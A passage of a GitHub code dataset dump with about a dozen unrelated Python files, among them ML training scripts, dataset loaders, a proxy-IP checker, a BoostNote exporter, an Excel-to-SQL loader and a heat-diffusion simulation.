Inicializando las variables\")\r\n\t session.run(tf.global_variables_initializer())\r\n\r\n\tif False:\r\n\t\toptimize(num_iterations=20000)\r\n\r\n \t#mostrando la precision\r\n\tprint_test_accuracy()\r\n\r\n # realizando un test a la red neuronal\r\n\tarrayTest = [16, 69, 100, 239, 341]\r\n\ttestCNN(arrayTest)\r\n\r\n\r\n","repo_name":"marbramen/CNN_CIFAR","sub_path":"cnnCIFAR_run.py","file_name":"cnnCIFAR_run.py","file_ext":"py","file_size_in_byte":10253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29556374306","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nfrom conjugate_gradient import conjugate_gradient_2\nfrom utils import CG_COLOR\n\nif __name__ == '__main__':\n\n # Problem formulation\n A = np.array([[4, 3, 0],\n [3, 4, -1],\n [0, -1, 4]])\n b = np.array([[24],\n [30],\n [-24]])\n\n x0 = np.array([[0, 0, 0]])\n x0 = x0.T\n\n err_code, x_star, steps, iters, proc_time, cg_norms = conjugate_gradient_2(A, b, 1e-10, 1_000)\n print(x_star)\n print(iters)\n\n # plotting the steps\n xs = [x[0] for x in steps]\n ys = [y[1] for y in steps]\n zs = [y[2] for y in steps]\n\n fig = plt.figure(figsize=(12, 12), dpi=400)\n ax = fig.add_subplot(111, projection='3d')\n ax.plot(xs, ys, zs, marker='x', linestyle='--', color=CG_COLOR)\n\n for x, y, z in zip(xs, ys, zs):\n label = f'({x:.2f}, {y:.2f}, {z:.2f})'\n ax.text(x, y, z, label)\n\n ax.set_xlabel('x1')\n ax.set_ylabel('x2')\n ax.set_zlabel('x3')\n # plt.show()\n plt.savefig('./plots/3d-plot.png', bbox_inches='tight')\n","repo_name":"hydenp/appm-4600-final-project","sub_path":"graph_steps.py","file_name":"graph_steps.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41789402166","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\nimport requests,threading,datetime\r\nfrom bs4 import BeautifulSoup\r\nimport random\r\n\r\n\"\"\"\r\n1、抓取西刺代理网站的代理ip\r\n2、并根据指定的目标url,对抓取到ip的有效性进行验证\r\n3、最后存到指定的path\r\n\"\"\"\r\n\r\n# ------------------------------------------------------文档处理--------------------------------------------------------\r\n# 写入文档\r\ndef write(path,text):\r\n with open(path,'a', encoding='utf-8') as f:\r\n f.writelines(text)\r\n f.write('\\n')\r\n# 清空文档\r\ndef truncatefile(path):\r\n with open(path, 'w', encoding='utf-8') as f:\r\n f.truncate()\r\n# 读取文档\r\ndef read(path):\r\n with open(path, 'r', encoding='utf-8') as f:\r\n txt = []\r\n for s in f.readlines():\r\n txt.append(s.strip())\r\n return txt\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# 计算时间差,格式: 时分秒\r\ndef gettimediff(start,end):\r\n seconds = (end - start).seconds\r\n m, s = divmod(seconds, 60)\r\n h, m = divmod(m, 60)\r\n diff = (\"%02d:%02d:%02d\" % (h, m, s))\r\n return diff\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# 返回一个随机的请求头 headers\r\ndef getheaders():\r\n user_agent_list = [ \\\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\", \\\r\n \"Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11\", \\\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6\", \\\r\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) 
Chrome/20.0.1090.0 Safari/536.6\", \\\r\n \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1\", \\\r\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5\", \\\r\n \"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5\", \\\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\", \\\r\n \"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\", \\\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\", \\\r\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3\", \\\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3\", \\\r\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\", \\\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\", \\\r\n \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\", \\\r\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3\", \\\r\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24\", \\\r\n \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24\"\r\n ]\r\n UserAgent=random.choice(user_agent_list)\r\n headers = {'User-Agent': UserAgent}\r\n return headers\r\n# -----------------------------------------------------检查ip是否可用----------------------------------------------------\r\ndef checkip(targeturl,ip):\r\n headers =getheaders() # 定制请求头\r\n proxies = {\"http\": \"http://\"+ip, \"https\": \"http://\"+ip} # 代理ip\r\n try:\r\n response=requests.get(url=targeturl,proxies=proxies,headers=headers,timeout=5).status_code\r\n if response == 200 :\r\n return True\r\n else:\r\n return False\r\n except:\r\n return False\r\n\r\n#-------------------------------------------------------获取代理方法----------------------------------------------------\r\n# 免费代理 XiciDaili\r\ndef findip(iplist, start, end, targeturl, path): # ip类型,页码,目标url,存放ip的路径\r\n for i in range(start, end):\r\n ip = iplist[i]\r\n is_avail = checkip(targeturl,ip)\r\n print(ip,'checking')\r\n if is_avail == True:\r\n write(path=path,text=ip)\r\n print(ip, 'success')\r\n else:\r\n print(ip, 'fail')\r\n\r\n#-----------------------------------------------------多线程抓取ip入口---------------------------------------------------\r\ndef getip(iplist, targeturl,path):\r\n truncatefile(path) # 爬取前清空文档\r\n start = datetime.datetime.now() # 开始时间\r\n threads=[]\r\n indexes = []\r\n for i in range(200):\r\n indexes.append(i*18)\r\n for i in range(199):\r\n t=threading.Thread(target=findip,args=(iplist, indexes[i], indexes[i+1], targeturl, path))\r\n #t=threading.Thread(target=findip,args=(4,pagenum+1,targeturl,path))\r\n threads.append(t)\r\n print('开始爬取代理ip')\r\n for s in threads: # 开启多线程爬取\r\n s.start()\r\n for e in threads: # 等待所有线程结束\r\n e.join()\r\n print('爬取完成')\r\n end = datetime.datetime.now() # 结束时间\r\n diff = gettimediff(start, end) # 计算耗时\r\n ips = read(path) # 读取爬到的ip数量\r\n print('一共爬取代理ip: %s 个,共耗时: %s \\n' % (len(ips), 
diff))\r\n\r\n#-------------------------------------------------------启动-----------------------------------------------------------\r\nif __name__ == '__main__':\r\n f = open('ip0.txt','r')\r\n iplist = f.readlines()\r\n lenOfIP = len(iplist)\r\n for i in range(lenOfIP):\r\n iplist[i] = iplist[i].split('//')[-1][:-2]\r\n f.close()\r\n path = 'ip.txt' # 存放爬取ip的文档path\r\n targeturl = 'https://www.baidu.com/' # 验证ip有效性的指定url\r\n getip(iplist, targeturl,path)","repo_name":"yuemonangong/Scholar-picture","sub_path":"crawler/temp/ip2.py","file_name":"ip2.py","file_ext":"py","file_size_in_byte":6284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13805531048","text":"import os\nimport re\nimport json\nimport cson\nimport tkinter\nimport tkinter.filedialog\n\n\ndef convert_to_name(dir_key, conf):\n \"\"\"Convert from directory key to directory name\n\n :param str dir_key: key in boostnote.json/folders/key\n :param dict conf: dictionary converted from boostnote.json\n :rtype: str\n :return: directory name\n \"\"\"\n\n return [meta['name'] for meta in conf['folders'] if meta['key'] == dir_key][0]\n\n\ndef sanitize(str_):\n \"\"\"Sanitize string for Windows\n\n target: \\\\/:,*?<>|\n\n :param str str_: string you want to sanitize\n :rtype: string\n :return: sanitized string\n \"\"\"\n\n if re.search('[\\\\/:,*?<>|]', str_) is None:\n return str_\n\n str_ = str_.replace('\\\\', '[backslash]')\n str_ = str_.replace('/', '[slash]')\n str_ = str_.replace(':', '[colon]')\n str_ = str_.replace(',', '[comma]')\n str_ = str_.replace('*', '[star]')\n str_ = str_.replace('?', '[question]')\n str_ = str_.replace('<', '[less]')\n str_ = str_.replace('>', '[greater]')\n str_ = str_.replace('|', '[pipe]')\n\n print(f'\"{str_}\" is sanitized')\n\n return str_\n\n\ndef extract_md_from_BoostNote():\n \"\"\"Extract Markdown from BoostNote\n \"\"\"\n\n cnt_success = 0\n cnt_skip = 0\n\n root = tkinter.Tk()\n root.withdraw()\n msg = 'Select your BoostNote working directory'\n boostnote = tkinter.filedialog.askdirectory(title=msg)\n conf_json = os.path.join(boostnote, 'boostnote.json')\n with open(conf_json) as f:\n conf = json.load(f)\n\n notes = os.path.join(boostnote, 'notes')\n for file in os.listdir(notes):\n with open(os.path.join(notes, file)) as f:\n note = cson.load(f)\n\n if note['type'] != 'MARKDOWN_NOTE':\n cnt_skip += 1\n continue\n\n key = note['folder']\n folder = convert_to_name(key, conf)\n title = note['title']\n content = note['content']\n\n if note['isTrashed']:\n folder = 'Trash'\n\n folder = sanitize(folder)\n title = sanitize(title)\n\n output_dir = os.path.join(boostnote, 'markdown', folder)\n os.makedirs(output_dir, exist_ok=True)\n output_file_name = title + '.md'\n output_file = os.path.join(output_dir, output_file_name)\n\n with open(output_file, 'w') as f:\n f.write(content)\n\n cnt_success += 1\n\n print('=============================================')\n print('Converting BoostNote to Markdown succeeded!!')\n print(f'success: \\t{cnt_success}')\n print(f'skip: \\t{cnt_skip}')\n\n\nif __name__ == '__main__':\n extract_md_from_BoostNote()\n","repo_name":"dorapon2000/boostnote2markdown","sub_path":"boostnote_to_markdown.py","file_name":"boostnote_to_markdown.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} 
+{"seq_id":"22944254775","text":"###############################################################################################\n# FUNCIÓN QUE INSERTA DATOS DESDE .XLSX FILE EN LA TABLA DE CLIENTES EN SQL SERVER\n###############################################################################################\n\nimport xlrd\nimport pyodbc\nfrom datetime import date\nfrom datetime import datetime\nimport re\n\ndef InsertarClientes(parameter_path):\n\n #Libro excel + hoja de trabajo\n Path = str(parameter_path)\n book = xlrd.open_workbook(Path)\n sheet = book.sheet_by_name('clientes')\n\n #Conexión con la bd\n conn = pyodbc.connect('Driver={SQL Server};' \n 'Server=DESKTOP-8LT275E\\SQLEXPRESS;'\n 'Database=DB_PYTHON;'\n 'Trusted_Connection=yes;')\n\n cursor = conn.cursor()\n\n #Creación de archivos .txt para informes\n f = open(\"Revisar_DIA.txt\",\"w+\")\n d = open(\"Revisar_MES.txt\",\"w+\")\n\n Nombre = \"\"\n Apellido = \"\"\n\n for i in range(1, sheet.nrows):\n\n Id = sheet.cell(i, 0).value\n Cod_Tip_Doc = sheet.cell(i, 1).value\n Cod_Genero = sheet.cell(i, 2).value\n Nombre_Completo = sheet.cell(i, 4).value\n Fecha_Nacimiento = sheet.cell(i, 5).value\n Fecha_Nacimiento = str(Fecha_Nacimiento)\n Ingresos = sheet.cell(i, 6).value\n Cod_Sucursal = sheet.cell(i, 7).value\n \n #Manejo de fecha de nacimiento para calcular edad\n Edad = sheet.cell(i, 5).value\n Edad = re.sub('[^0-9]', '', str(Edad))\n año = Edad[0:4]\n mes = Edad[4:6]\n dia = Edad[6:8]\n if mes == '02' and dia == '29':\n dia = '28'\n #Llenado de .txt\n f.write(\"Nombre :\"+ str(Nombre_Completo) +\"Documento :\" + str(Id) + '\\n')\n elif mes == '00':\n mes = '01'\n d.write(\"Nombre\"+ str(Nombre_Completo) +\"Documento :\" + str(Id) + '\\n')\n\n Fecha = año + '-' + mes + '-' + dia\n\n #Día actual\n today = date.today()\n datetime_object = datetime.strptime(Fecha, '%Y-%m-%d').date()\n años = ((today - datetime_object) / 365.25)\n años = re.sub('[^0-9]', '', str(años))\n Edad = int(años[0:2])\n #Fin manejo de fecha de nacimiento para calcular edad\n\n #Separando nombres y apellidos según len\n lista = Nombre_Completo.split()\n if len(lista) == 1:\n Nombre = lista[0]\n elif len(lista) == 2:\n Nombre = lista[0]\n Apellido = lista[1]\n elif len(lista) == 3:\n Nombre = lista[0]\n Apellido = lista[1] + ' ' + lista[2]\n elif len(lista) == 4:\n Nombre = lista[0] + ' ' + lista[1]\n Apellido = lista[2] + ' ' + lista[3]\n elif len(lista) >= 5:\n Nombre = lista[0] + ' ' + lista[1] + ' ' + lista[2]\n Apellido = lista[3] + ' ' + lista[4]\n #fin separando nombres y apellidos según len\n\n query = '''INSERT INTO CLIENTES \n (Id, Cod_Tip_Doc, Cod_Genero, Nombre_Completo, Nombre, Apellido, Fecha_Nacimiento, Ingresos, Cod_Sucursal,Edad) \n VALUES (?,?,?,?,?,?,?,?,?,?)'''\n values = (Id, Cod_Tip_Doc, Cod_Genero, Nombre_Completo, Nombre,\n Apellido, Fecha_Nacimiento, Ingresos, Cod_Sucursal, Edad)\n cursor.execute(query, values)\n conn.commit()\n\n print(\"Se insertaron : \" + str(sheet.nrows - 1) +\n \" registros en la tabla CLIENTES\")\n cursor.close()\n conn.close()\n f.close()","repo_name":"Julianoquendogr/PYTHON_DB","sub_path":"CLIENTES.py","file_name":"CLIENTES.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"526055707","text":"import numpy as np\r\nimport os\r\nimport torch\r\nfrom torch.utils.data import Dataset, DataLoader\r\n\r\n\r\nroot_dir = \"\"\r\ntrain_feature = os.path.join(root_dir, 'x_train.npy')\r\ntrain_label = 
os.path.join(root_dir, 'y_train.npy')\r\nval_feature = os.path.join(root_dir, \"x_test.npy\")\r\nval_label = os.path.join(root_dir, 'y_test.npy')\r\n\r\n\"\"\"\r\nbatch_size should equal to n: 100\r\n\"\"\"\r\n\r\nclass FilterDataset(Dataset):\r\n def __init__(self, feature_path, label_path):\r\n self.feature = np.load(feature_path)\r\n self.label = np.load(label_path)\r\n\r\n def __len__(self):\r\n return len(self.feature)\r\n\r\n def __getitem__(self, idx):\r\n f = self.feature[idx, :]\r\n l = self.label[idx, :]\r\n\r\n # convert to tensor\r\n f = torch.from_numpy(f.copy()).float()\r\n l = torch.from_numpy(l.copy()).float()\r\n l = l.unsqueeze(1)\r\n\r\n return f, l\r\n\r\n\r\nif __name__ == \"__main__\":\r\n train_data = FilterDataset(feature_path=train_feature, label_path=train_label)\r\n\r\n # show a batch\r\n batch_size = 5\r\n\r\n for i in range(batch_size):\r\n feature, label = train_data[i]\r\n print(i, feature.size(), label.size())\r\n\r\n dataloader = DataLoader(train_data, batch_size=batch_size, shuffle=False, num_workers=4)\r\n\r\n for i, batch in enumerate(dataloader):\r\n print(i, batch[0].size(), batch[1].size())\r\n","repo_name":"calibertytz/Neural-particle-filter","sub_path":"filterdata_loader.py","file_name":"filterdata_loader.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2953059698","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 3 08:46:58 2019\n\n@author: stewjo\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nA= np.random.rand(128,128)\nA[:,:]= 0.0\nA[30:40,0] = 100\nA[0,70:80]= -100\nA[-1,115:120]= -100\n\n\n# Display it\np = plt.imshow(A, interpolation='nearest')\nplt.set_cmap('OrRd')\nplt.pause(2)\n\n\nfor t in range(2000):\n Aold= np.copy(A)\n for i in range(1,127):\n for j in range(1,127):\n A[i,j]= 0.9*Aold[i,j] + 0.1 * \\\n ( Aold[i+1,j-1] + Aold[i+1,j] + Aold[i+1,j+1] +\n Aold[i ,j-1] + Aold[i ,j+1] +\n Aold[i-1,j-1] + Aold[i-1,j] + Aold[i-1,j+1] )/8.0\n for i in range(127):\n A[i,0] = A[i,1]\n A[i,-1] = A[i,-2]\n A[0,i] = A[1,i]\n A[-1,i] = A[-2,i]\n\n for i in range(30,100):\n A[i,0]= 100\n\n for i in range(115,120):\n A[-1,i]= -100\n\n for i in range(70,80):\n A[0,i]= -100\n \n p.set_data(A)\n plt.pause(.01)\n","repo_name":"att10/CreativeDynamics","sub_path":"pythonprojects/heat.py","file_name":"heat.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18223939621","text":"from torch.utils.data import Dataset\nfrom torchvision import transforms\nfrom pathlib import Path\nfrom PIL import Image\nfrom glob import glob\n\n\nclass ImageNet(Dataset):\n # https://www.kaggle.com/competitions/imagenet-object-localization-challenge/data\n # Downloading LOC_synset_mapping.txt file from the URL above\n # for getting synset and label name mapping\n\n def __init__(self, root_path: str, label_path: str, mode: str = \"train\"):\n assert mode in [\"train\", \"val\"], \"mode must be either train or val\"\n folder_path = f\"{root_path}/{mode}\"\n self.image_list = glob(f\"{folder_path}/n*/*\")\n self.transformer = transforms.Compose(\n [\n transforms.RandAugment(num_ops=2, magnitude=15),\n transforms.RandomResizedCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(\n mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]\n ),\n ]\n )\n self._get_labels(label_path)\n\n def _get_labels(self, label_path: str) -> dict:\n 
synset_mapper = {}\n label_mapper = {}\n with open(label_path, \"r\") as fileLink:\n rows = fileLink.readlines()\n for target_id, row in enumerate(rows):\n row = row.replace(\"\\n\", \"\")\n collection = row.split(\" \")\n synset_id = collection[0]\n name = \" \".join(collection[1:])\n synset_mapper[synset_id] = name\n label_mapper[name] = target_id\n\n self.synset_mapper = synset_mapper\n self.label_mapper = label_mapper\n\n def __len__(self) -> int:\n return len(self.image_list)\n\n def __getitem__(self, index: int) -> dict:\n image_path = self.image_list[index]\n image = Image.open(image_path).convert(\"RGB\")\n image = self.transformer(image)\n synset_id = Path(image_path).parent.name\n label = self.synset_mapper[synset_id]\n target_id = self.label_mapper[label]\n\n return {\"features\": image, \"targets\": target_id, \"labels\": label}\n","repo_name":"avalonliberty/ResNet-RS","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18357037947","text":"from ftw.inflator.customization import InflatorCustomization\nfrom ftw.inflator.interfaces import IInflatorCustomization\nfrom unittest import TestCase\nfrom zope.interface.verify import verifyClass\n\n\nclass TestCustomizationUtility(TestCase):\n\n def test_customization_implements_interface(self):\n self.assertTrue(IInflatorCustomization.implementedBy(InflatorCustomization))\n verifyClass(IInflatorCustomization, InflatorCustomization)\n\n def test_stores_arguments(self):\n obj = InflatorCustomization(product=u'foo',\n image='++resource++bar.jpg',\n order=7)\n\n self.assertEqual(obj.product, u'foo')\n self.assertEqual(obj.image, '++resource++bar.jpg')\n self.assertEqual(obj.order, 7)\n\n def test_defaults(self):\n obj = InflatorCustomization()\n\n self.assertEqual(obj.product, None)\n self.assertEqual(obj.image, None)\n self.assertEqual(obj.order, 10)\n","repo_name":"4teamwork/ftw.inflator","sub_path":"ftw/inflator/tests/test_customization_utility.py","file_name":"test_customization_utility.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"22686875576","text":"# April 2023, Ana Margarida Ferro\r\n\r\ndef get_sec(time_str):\r\n \"\"\"Get seconds from time.\"\"\"\r\n m, s = time_str.split(':')\r\n return int(m) * 60 + int(s)\r\n\r\ndef organize_videos_details(header,ts):\r\n list = []\r\n ts_list = []\r\n with open(header, 'r') as f:\r\n i = 1\r\n for row in f:\r\n # row variable is a list that represents a row in csv\r\n row = row.strip('\\n')\r\n if(i<139):\r\n if i < 10:\r\n row += \",p_00\" + str(i) + ',' # , to process in the sh file everything well\r\n i += 1\r\n list.append(row)\r\n elif(i<100 and i>=10):\r\n row += \",p_0\" + str(i) +',' # , to process in the sh file everything well\r\n i += 1\r\n list.append(row)\r\n else:\r\n row += \",p_\" + str(i) + ',' # , to process in the sh file everything well\r\n i += 1\r\n list.append(row)\r\n f.close()\r\n\r\n with open(ts, 'r') as g:\r\n for row in g:\r\n #row = row.strip('\\n')\r\n #row = row.replace(\"-\",\",\")\r\n #row += ','\r\n\r\n #Get the duration of each video\r\n #timestamp = row.split(\",\")\r\n #ti = get_sec(timestamp[0])\r\n #tf = get_sec(timestamp[1])\r\n #totalsec = tf-ti\r\n #row+=str(totalsec)\r\n\r\n ts_list.append(row)\r\n g.close()\r\n\r\n for index in range(len(list)):\r\n line1 = list[index].strip('\\n')\r\n 
line2 = ts_list[index].strip('\\n')\r\n line = line1 + line2\r\n print(line)\r\n\r\n\r\nif __name__ == '__main__':\r\n organize_videos_details('../videos_PD_test.csv','../times_stamps.csv')\r\n","repo_name":"amargaridaferro/PD-Detection-Based-Visual-Spech","sub_path":"scriptsToGetStatisticalData/change_config_videos.py","file_name":"change_config_videos.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13805531048","text":"try:\n from app.core.ModelPreProcess import ModelPreProcess\n from app.core.OLSRegressor import OLSRegressor \nexcept: # to avoid exception when runing localy and service\n from ModelPreProcess import ModelPreProcess\n from OLSRegressor import OLSRegressor \n \nimport json\n\nclass Train:\n \n def __init__(self, mode=\"\", TRAIN_FILE=\"\"):\n self.mode = mode\n self.shp = ModelPreProcess()\n self.ols = OLSRegressor()\n \n self.TRAIN_FILE = TRAIN_FILE\n\n def train(self): \n \n temp_mode = self.mode\n if temp_mode == \"\":\n temp_mode = \"complete\"\n \n APP_PATH = \"app/core/\" \n \n train_df = self.shp.load_csv(self.TRAIN_FILE)\n \n # Shuffle and Split the train_df\n train_df = self.shp.shuffle_dataframe(train_df) \n train_df, test_df = self.shp.split_dataframe( train_df, (len(train_df.index)*80)//100 )\n self.shp.dataframe_to_csv(train_df, self.TRAIN_FILE[:-4] + \"_Train.csv\", train_df.columns)\n self.shp.dataframe_to_csv(test_df, self.TRAIN_FILE[:-4] + \"_Test.csv\", train_df.columns)\n \n try:\n with open('config/'+temp_mode+'.json') as f:\n data = json.load(f)\n except:\n with open('app/core/config/'+temp_mode+'.json') as f:\n data = json.load(f)\n \n cols, encoder_data = data['cols'], data['encoder_data']\n \n X, y = self.shp.getXandY(train_df, cols, encoder_data)\n \n model = self.ols.fit(X, y) \n \n # if TRAIN_FILE name contains 'app/core/' in the\n # beginning (because of service call) then remove it before saving\n if self.TRAIN_FILE.startswith(APP_PATH):\n self.TRAIN_FILE = self.TRAIN_FILE[len(APP_PATH):]\n \n try:\n self.ols.save_data(model, APP_PATH + 'models/' + self.mode +'/pickledModel.pkl') \n self.ols.save_data(len(X), APP_PATH + 'models/' + self.mode +'/pickledTrainingLength.pkl') \n self.ols.save_data(self.TRAIN_FILE[:-4] + \"_Train.csv\", APP_PATH + 'models/' + self.mode +'/pickledTrainFileName.pkl')\n except: # to avoid exception when runing localy and service\n self.ols.save_data(model, 'models/'+self.mode + '/pickledModel.pkl') \n self.ols.save_data(len(X), 'models/'+self.mode +'/pickledTrainingLength.pkl') \n self.ols.save_data(self.TRAIN_FILE[:-4] + \"_Train.csv\", 'models/'+self.mode + '/pickledTrainFileName.pkl')\n \n return self.ols.getRsquared(model)\n \n\"\"\"\n if needs to be trained locally from this file only, uncomment the following lines:\n \n# For Month\nt = Train(mode=\"month\", TRAIN_FILE=\"datasets/Data11k_m.csv\")\nt.train()\n \n# For weight\nt = Train(mode=\"weight\", TRAIN_FILE=\"datasets/Data11k_w.csv\")\nt.train()\n \n# For complete\nt = Train(mode=\"\", TRAIN_FILE=\"datasets/Data11k.csv\")\nt.train()\n\n# For delwin\nt = Train(mode=\"delwin\", TRAIN_FILE=\"datasets/delwin_6k.csv\")\nt.train()\n\n\"\"\"","repo_name":"learningdesai/ml-app","sub_path":"app/core/Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39938695531","text":"import time\nimport argparse\n\nfrom scienceworld import 
ScienceWorldEnv\n\n\ndef userConsole(args):\n \"\"\" Example user input console, to play through a game. \"\"\"\n exitCommands = [\"quit\", \"exit\"]\n\n taskIdx = args['task_num']\n simplificationStr = args['simplification_str']\n\n # Initialize environment\n env = ScienceWorldEnv(\"\", args['jar_path'], envStepLimit = args['env_step_limit'])\n taskNames = env.getTaskNames()\n print(\"Task Names: \" + str(taskNames))\n\n # Choose task\n taskName = taskNames[taskIdx]\n env.load(taskName, args['var_num'], simplificationStr, generateGoldPath=True)\n print(\"Starting Task \" + str(taskIdx) + \": \" + taskName)\n time.sleep(2)\n\n\n # Reset the environment\n initialObs, initialDict = env.reset()\n\n\n\n #\n # Examples of how to access much of the environment information that the API exposes.\n # (Many of these are similar to the Jericho API)\n #\n print(\"Task Names: \" + str(taskNames))\n print(\"Possible actions: \" + str(env.getPossibleActions()) )\n print(\"Possible objects: \" + str(env.getPossibleObjects()) )\n templates, lut = env.getPossibleActionObjectCombinations()\n print(\"Possible action/object combinations: \" + str(templates))\n #print(\"Object IDX to Object Referent LUT: \" + str(lut))\n print(\"Vocabulary: \" + str(env.getVocabulary()) )\n print(\"Possible actions (with IDs): \" + str(env.getPossibleActionsWithIDs()))\n print(\"Possible object types: \" + str(env.getObjectTypes()))\n print(\"Object IDX to Object Referent LUT: \" + str(lut))\n print(\"\\n\")\n print(\"Possible object referents LUT: \" + str(env.getPossibleObjectReferentLUT()))\n print(\"\\n\")\n print(\"Valid action-object combinations: \" + str(env.getValidActionObjectCombinations()))\n print(\"\\n\")\n print(\"Object_ids to type_ids: \" + str(env.getAllObjectTypesLUTJSON()))\n print(\"\\n\")\n print(\"All objects, their ids, types, and referents: \" + str(env.getAllObjectIdsTypesReferentsLUTJSON() ))\n print(\"\\n\")\n print(\"Valid action-object combinations (with templates): \" + str(env.getValidActionObjectCombinationsWithTemplates() ))\n print(\"\\n\")\n print(\"Object Type LUT: \" + str(env.getPossibleObjectReferentTypesLUT()))\n print(\"Variations (train): \" + str(env.getVariationsTrain() ))\n\n print(\"\")\n print(\"----------------------------------------------------------------------------------\")\n print(\"\")\n\n\n print(\"Gold Path:\" + str(env.getGoldActionSequence()))\n\n print(\"Task Name: \" + taskName)\n print(\"Variation: \" + str(args['var_num']) + \" / \" + str(env.getMaxVariations(taskName)))\n print(\"Task Description: \" + str(env.getTaskDescription()) )\n\n #\n # Main user input loop\n #\n userInputStr = \"look around\" # First action\n while (userInputStr not in exitCommands):\n if (userInputStr == \"help\"):\n print(\"Possible actions: \")\n for actionStr in env.getPossibleActions():\n print(\"\\t\" + str(actionStr))\n\n elif (userInputStr == \"objects\"):\n print(\"Possible objects (one referent listed per object): \")\n for actionStr in env.getPossibleObjects():\n print(\"\\t\" + str(actionStr))\n\n elif (userInputStr == \"valid\"):\n print(\"Valid action-object combinations:\")\n print(env.getValidActionObjectCombinationsWithTemplates())\n\n elif (userInputStr == 'goals'):\n print(env.getGoalProgressStr())\n\n else:\n # Send user input, get response\n observation, reward, isCompleted, info = env.step(userInputStr)\n score = info['score']\n print(\"\\n\" + observation)\n print(\"Reward: \" + str(reward))\n print(\"Score: \" + str(score))\n print(\"isCompleted: \" + 
str(isCompleted))\n #print(\"info: \" + str(info))\n\n print(\"'help' lists valid action templates, 'objects' lists valid objects, 'valid' lists valid action-object combinations (long!). \")\n print(\"'goals' lists progress on subgoals.\")\n print(\"type 'exit' to quit.\")\n\n # Get user input\n userInputStr = input('> ')\n # Sanitize input\n userInputStr = userInputStr.lower().strip()\n\n\n # Display run history\n runHistory = env.getRunHistory()\n print(\"Run History:\")\n print(runHistory)\n for item in runHistory:\n print(item)\n print(\"\")\n\n # Display subgoal progress\n print(env.getGoalProgressStr())\n\n print(\"Completed.\")\n\n\ndef build_simplification_str(args):\n \"\"\" Build simplification_str from args. \"\"\"\n simplifications = list()\n if args[\"teleport\"]:\n simplifications.append(\"teleportAction\")\n\n if args[\"self_watering_plants\"]:\n simplifications.append(\"selfWateringFlowerPots\")\n\n if args[\"open_containers\"]:\n simplifications.append(\"openContainers\")\n\n if 